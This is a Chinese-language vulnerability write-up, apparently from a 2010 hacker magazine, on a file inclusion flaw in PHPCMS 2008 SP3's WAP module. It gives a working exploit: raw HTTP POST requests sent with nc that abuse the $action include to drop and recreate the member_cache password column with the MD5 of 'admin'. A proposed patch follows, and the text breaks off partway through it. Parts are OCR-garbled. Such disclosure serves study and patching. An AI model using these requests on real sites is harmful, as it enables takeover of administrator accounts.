1、PHPCMS整站系統漏洞分析(原始稿件，已發表于2010年黑客手冊第一季)(廖堅先)Bykid廣東科干今天要跟大家分享這個漏洞是版本為phpcms2008SP3 _gbk_20100125的整站系統的，這 是個包含漏洞。立刻進正題，最后再總結分析；漏洞還是出現在最容易被忽視的wap模塊，打開wap文件夾下的index.php文件，關鍵 代碼如下：include ./include/common.inc.php;include ./include/global.func.php;$lang = include ./include/lang.inc.php;if(preg_match(/(mozi

2、lla|m3gate|winwap|openwave)/i, $_SERVERHTTP_USER_AGENT)( 這里檢查瀏覽器是否為手機的，但是可以偽造HTTP_USER_AGENT繞過header(location:./);wmlHeader($PHPCMSsitename);$action = isset($action) & !empty($action) ? $action : index;if($action)include ./include/.$action.inc.php; /重點第14行也就是“include./include/.$action.inc.php;”，程序員很

3、放心的直接把用戶提交 的$action變量放進了包含文件的路徑中，雖然后綴被限制成“.inc.php”，但是有沒有想過管 理員的管理模塊的文件也是后綴為“ .inc.php”的呢？而且很多這些模塊文件都是用常量 “IN_PHPCMS ”作為防止直接訪問的標識，同時管理員的管理模塊的訪問權限的檢查是在 整站根目錄的admin.php文件進行的，那樣我也就可以放心的包含了。還有一點值得高興的 是因為是“變異”的包含文件所以有的變量是沒有初始化的也就是我們可以控制了。但杯 具”的是很多模塊的功能小模塊是通過“switch($action)”來運行的，也就是這類型的文件 我們只能找“ default

4、”語句塊來利用了。經過雙手都數不清雙擊打開文件檢查，找到了一個不算完美的利用方法。可以包含的 文件是“include/fields/box/field_add.inc.php 和 field_delete.inc.php”，“fields” 下的文件都是 對表中的字段操作的文件。這次要進行操作的字段是“phpcms_member_cache”表(PS :這 個表是phpcms_member的鏡像表，真搞不懂為什么要搞出這個表來)中的“password”字 段。為什么我會說不完美呢，因為是操作的是password字段，不是一個記錄，但是卻可以 達到進入管理后臺的目的field_add.inc.p

5、hp和field_delete.inc.php關鍵代碼如下：field_add.inc.phpquery($sql);?field_delete.inc.phpquery($sql);?接下來說我的思路，首先是通過“field_delete.inc.php”刪掉password字段，然后再通 過“field_add.inc.php”添加一個默認值為admin的MD5值的password字段，這樣所有的記 錄的password都是admin 了（很郁悶吧），不過最后還是可以把“phpcms_member”重新復 制到 “phpcms_member_cache ”表中的。實踐是檢驗真理的唯一標準。

6、實踐用的是“phpcms2008sp3_gbk_091230”，但打過“phpcms2008_patch_gbk_100125”補丁。實踐要用到的文件如圖一：首先運行“ drop_cache_password.bat ”刪掉刪掉 password字段，相關文件 “drop_cache_password.bat”(內容如圖二)和“drop.txt”(內容如圖三)。drop_cache_password.bat - 本 如囹二 文件(F) 編輯任)格式(O) 查看(V) 幫助(H)echo按任意鍵刪除member_cache表password字段！pausenc 127. 0. 0. 1 82 K

7、fDOCTVPE wml PUBLIC -/WAPFORUMZ/DTD WML 1.3/ http：Z/DTD .1.xmlkwmlK/headkcard id = Rphpc ns Um 1r tit le = TlipcmsMkpk s ma 11 Po we re d by Phpcms2008k/pk/cardk/wml接下來運行“add_cache_password.bat”，相關文件“add_cache_password.bat”(內容如圖五)和“ add.txt”(內容如圖六)。_| add_cache_passv7ord.bat -文件(F)牌E)假(O)查看(V)落助(H)|

8、echo按任意鍵添加member_cache表password字段！pausenc 127. 0. 0. 1 82 add. txt如圖五| add .txt -記事本 文#(B 桐帆(0) 兼GO 幫助POST /phpcms2008sp3_gbk_091230/wap/index, php HTTP/1.1Accept: image/jpeg, app1ication/x-ms-app1ication, image/gif, application/xaml +xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-

9、flash, Iapplication/msword, application/vnd. ms-excel, application/vnd. ms-powerpoint,Referer： bykidAccept-Language: zh-CN圖六Content-Type: application/x-www-form-ur1encodedAccept-Encoding: gzip, deflateUser-Agent: Mozilbykidla/4. 0 (compatible: MSIE 7. 0; Windows NT 6.1;Trident/4. 0： SLCC2; .NET CLR

10、2.0. 50727; .NET CLR 3.5.30729; .NET CLR3.0.30729; Media Center PC 6. 0; MAXTHON 2. 0)Host: localhost:82Content-Length: 160Connection: Keep-AliveCache-Control: no-cacheaction=. /. . /include/f ields/box/f ield_add&tablename=phpcms_member_cache&f ield= password&fieldtype=char&maxlength-32&defaultvalu

11、e=21232f297a57a5a743894a0e4a80 lfc3“add.txt”增加提交了變量fieldtype（字段的類型）,maxlength（類型的最大長度），defaultvalue （默認值），執行之后如圖七表明成功。現在看看表“phpcms_member_cache”有沒有被改掉，如圖八：最后上傳“recoverCache.php”到 phpcms 的根目錄恢復 “phpcms_member_cache”表。如圖九運行成功：再看看“ phpcms_member_cache ”表如圖十:漏洞的修補，最簡單的修補方法是也用switch($action)語句，畢竟wap下要包含的

12、文件 就四個；修改后的代碼如下(PS:代碼沒有測試，短短幾個語句我覺得是沒問題的)：?phpinclude ./include/common.inc.php;include ./include/global.func.php;$lang = include ./include/lang.inc.php;if(preg_match(/(mozillalm3gatelwinwaplopenwave)/i, $_SERVERHTTP_USER_AGENT)header(location:./);wmlHeader($PHPCMSsitename);$action = isset($action) & !empty($action) ? $action : index;switch($action) /修改后代碼-開始case index:include ./include/index.inc.php;case list:include ./include/list.inc.php;case show_info:include ./include/show_info.inc.php;case show_news:inclu